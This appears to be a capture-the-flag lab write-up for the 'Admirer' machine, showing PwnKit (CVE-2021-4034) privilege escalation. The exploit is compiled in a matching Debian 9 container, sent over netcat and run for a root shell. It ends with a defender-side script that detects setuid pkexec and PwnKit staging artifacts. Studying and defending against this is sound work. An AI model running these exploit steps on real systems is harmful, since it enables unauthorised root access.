CVE-2021-4034


LinPEAS discovered that the target system is vulnerable to CVE-2021-4034.

A vulnerability classified as critical has been found in polkit (affected version unknown). It affects some unknown processing of the file /usr/bin/pkexec. Manipulation with an unknown input leads to an access control vulnerability, classified as CWE-284: the software does not restrict, or incorrectly restricts, access to a resource from an unauthorized actor. Confidentiality, integrity, and availability are impacted.

Exploit (PwnKit)


Exploit available online

waldo@admirer:~$ gcc ; cc ; make
-bash: gcc: command not found
-bash: cc: command not found
-bash: make: command not found

Since the target system has no compiler installed, the exploit must be compiled off the target, on a system with a matching glibc, and then transferred over.

Docker Exploit Development


The target system is Devuan ASCII, a fork of Debian.

According to Wikipedia, Devuan ASCII is based on Debian 9 "Stretch".

┌──(kali㉿kali)-[~/archive/htb/labs/admirer]
└─$ docker run -it --entrypoint "/bin/bash" --name admirer debian:9      
Unable to find image 'debian:9' locally
9: Pulling from library/debian
8372a04f222b: Pull complete 
Digest: sha256:c5c5200ff1e9c73ffbf188b4a67eb1c91531b644856b4aefe86a58d2f0cb05be
Status: Downloaded newer image for debian:9
root@bccd0ee7b79a:/# 

Starting a Docker container from a Debian 9 image.

root@bccd0ee7b79a:/# ldd --version
ldd (Debian GLIBC 2.24-11+deb9u4) 2.24
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

The container's glibc version is verified to match the target's.

root@bccd0ee7b79a:/# apt update -y ; apt install -y net-tools netcat nano gcc gcc-multilib make git ; cd root

Installing the necessary packages.

root@bccd0ee7b79a:~# git clone https://github.com/berdav/CVE-2021-4034.git ; cd CVE-2021-4034 
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
Unpacking objects: 100% (92/92), done.

Downloading the exploit package.

root@bccd0ee7b79a:~/CVE-2021-4034# make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.

Compiling the exploit and its payload shared object.

root@bccd0ee7b79a:~/CVE-2021-4034# cd ../ ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034
root@bccd0ee7b79a:~# nc 10.10.10.187 2222 < CVE-2021-4034.tar.gz 
waldo@admirer:~$ nc -nlvp 2222 > CVE-2021-4034.tar.gz
listening on [any] 2222 ...
connect to [10.10.10.187] from (UNKNOWN) [10.10.16.8] 47520

Delivery to the target is complete.

Exploitation


waldo@admirer:~$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034

Extracting the compiled exploit package.

waldo@admirer:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
whoami
root
# hostname
hostname
admirer
# ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.187  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 fe80::250:56ff:feb9:1993  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:1993  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:19:93  txqueuelen 1000  (Ethernet)
        RX packets 1956575  bytes 348510939 (332.3 MiB)
        RX errors 0  dropped 18  overruns 0  frame 0
        TX packets 1816878  bytes 1007385879 (960.7 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1  (Local Loopback)
        RX packets 7356  bytes 726520 (709.4 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 7356  bytes 726520 (709.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise
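From the defender's side, the following is an added example, not code from the original writeup or from the exploit repository: a POSIX shell script that checks whether a host's pkexec still carries the setuid bit PwnKit depends on, scans a directory for the on-disk staging artifacts the make step above leaves behind (a directory literally named GCONV_PATH=. and a gconv-modules file registering a fake PWNKIT converter), and applies the published interim mitigation of dropping the setuid bit. The path /usr/bin/pkexec comes from the advisory text above; the function names, the assumption of a Linux host with GNU stat, and the default scan directory are this example's own.

```shell
#!/bin/sh
# Added defender-side check for CVE-2021-4034 (PwnKit); not part of the original writeup.
# Assumptions: Linux host with POSIX sh, find, grep and GNU stat; pkexec lives at
# /usr/bin/pkexec (the path named in the advisory). Function names are this example's own.

PKEXEC="${PKEXEC:-/usr/bin/pkexec}"

# Returns 0 if FILE exists and carries the setuid bit. PwnKit needs a setuid pkexec;
# without that bit the binary cannot be used for privilege escalation.
is_setuid() {
    [ -f "$1" ] && [ -u "$1" ]
}

# Returns 0 (and prints a warning) if the given pkexec is still setuid and root-owned,
# i.e. in the configuration the exploit requires; returns 1 otherwise.
pkexec_exposed() {
    f="$1"
    if [ ! -f "$f" ]; then
        echo "[-] $f not present"; return 1
    fi
    owner=$(stat -c '%U' "$f" 2>/dev/null || echo unknown)
    if is_setuid "$f" && [ "$owner" = "root" ]; then
        echo "[!] $f is setuid root: install the patched polkit package or run harden_pkexec"
        return 0
    fi
    echo "[+] $f is not setuid root"; return 1
}

# Scans ROOT for the staging artifacts the exploit's build step creates: a directory
# literally named "GCONV_PATH=." and a gconv-modules file that registers a fake "PWNKIT"
# converter (both visible in the make output above). Prints each hit; returns 0 if any
# artifact was found, 1 otherwise.
find_pwnkit_staging() {
    root="$1"
    dirs=$(find "$root" -type d -name 'GCONV_PATH=.' 2>/dev/null || true)
    mods=$(find "$root" -type f -name 'gconv-modules' \
              -exec grep -l 'PWNKIT' {} + 2>/dev/null || true)
    [ -n "$dirs$mods" ] || return 1
    [ -n "$dirs" ] && printf 'staging directory: %s\n' "$dirs"
    [ -n "$mods" ] && printf 'fake gconv-modules: %s\n' "$mods"
    return 0
}

# Interim mitigation published for PwnKit: drop the setuid bit so pkexec can no longer
# be abused for privilege escalation. The lasting fix is the distribution's patched package.
harden_pkexec() {
    chmod 0755 "$1"
}

# Usage: sh pwnkit_check.sh --scan DIR   (checks $PKEXEC, then scans DIR; default /tmp)
if [ "${1:-}" = "--scan" ]; then
    pkexec_exposed "$PKEXEC" || true
    find_pwnkit_staging "${2:-/tmp}" || echo "[+] no PwnKit staging artifacts under ${2:-/tmp}"
fi
```

Removing the setuid bit disables legitimate pkexec-based privilege elevation as well, so treat it as a stopgap until the distribution's fixed polkit package is installed; the artifact scan is useful for confirming whether a compromised host was staged the way this writeup shows.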